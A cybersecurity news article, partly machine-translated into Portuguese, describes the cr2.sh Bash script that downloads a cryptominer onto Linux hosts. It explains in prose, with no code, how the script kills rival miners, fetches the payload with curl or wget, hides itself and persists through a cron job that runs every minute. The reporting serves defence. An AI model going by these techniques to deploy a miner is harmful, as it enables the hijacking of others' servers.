Malicioso Bash Script downloads Cryptominer em Hosts Linux
CYBER NEWS

Malicioso Bash Script downloads Cryptominer em Hosts Linux

pesquisadores Sucuri apenas relatou que alguém entrou em contato com eles sobre “um processo malicioso que tinham descoberto em execução no seu servidor web”. O processo em questão era bastante pesado na CPU, pointing to a cryptominer process running in the background.




During their analysis, the researchers were able to determine that the cryptominer was downloaded via a Bash script known as cr2.sh, which is dropped on the server in an unknown way.

What happens after the bash file is executed? It is set to kill processes from a list of process names which is related to the cryptomining, such as xmrig and cryptonight, entre outros.

It then checks to see whether the malicious process is already running and sends a request to a PHP file hosted on a separate server. This file outputs the IP address that grabs the actual cryptominer content run by the malicious process.

More about the cr2.sh bash script

The cr2.sh script also needs to determine whether the OS environment is 32- or 64-bit in order to download the cryptomining payload. To do this it utilizes the curl ou wget command as /tmp/php, while the miner’s configuration file is downloaded from the same server, os pesquisadores explicaram.

The script has now downloaded to the web server all of the necessary content to go ahead and spawn the process using nohup, which allows the process to continue running regardless if the user ends their bash session.

In its next phase, the miner process now loaded in the Linux host’s memory will delete the payload as well as its configuration file. This is done to secure and conceal its presence.

relacionado: Linux Subsystem no Windows 10 Torna vulnerável a Bashware

The malware is also capable of achieving persistence by creating a cron job that is set to run every minute. além do que, além do mais, it will check for the the cr2.sh Bash script, and if the script is missing, it will re-download and execute it once again:

Just in case someone detects the process and kills it along with the initial cr2.sh file, the file creates a cronjob (unless it exists already). This cron is scheduled to run every minute, re-download the cr2.sh file if it is missing, and execute the malicious bash script.

Note that not only web servers are targeted by this attack but also desktop installations of 32/64bit Linux systems, and other variants, deployed to infect Windows installations.

Avatar

Milena Dimitrova

Um escritor inspirado e gerenciador de conteúdo que foi com SensorsTechForum para 4 anos. Gosta de ‘Sr.. Robot’e medos‘1984’. Focada na privacidade do usuário e desenvolvimento de malware, ela acredita fortemente em um mundo onde a segurança cibernética desempenha um papel central. Se o senso comum não faz sentido, ela vai estar lá para tomar notas. Essas notas podem mais tarde se transformar em artigos! Siga Milena @Milenyim

mais Posts

Me siga:
Twitter

Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

limite de tempo está esgotado. Recarregue CAPTCHA.

Compartilhar no Facebook Compartilhar
Carregando...
Compartilhar no Twitter chilrear
Carregando...
Compartilhar no Google Plus Compartilhar
Carregando...
Partilhar no Linkedin Compartilhar
Carregando...
Compartilhar no Digg Compartilhar
Compartilhar no Reddit Compartilhar
Carregando...
Partilhar no StumbleUpon Compartilhar
Carregando...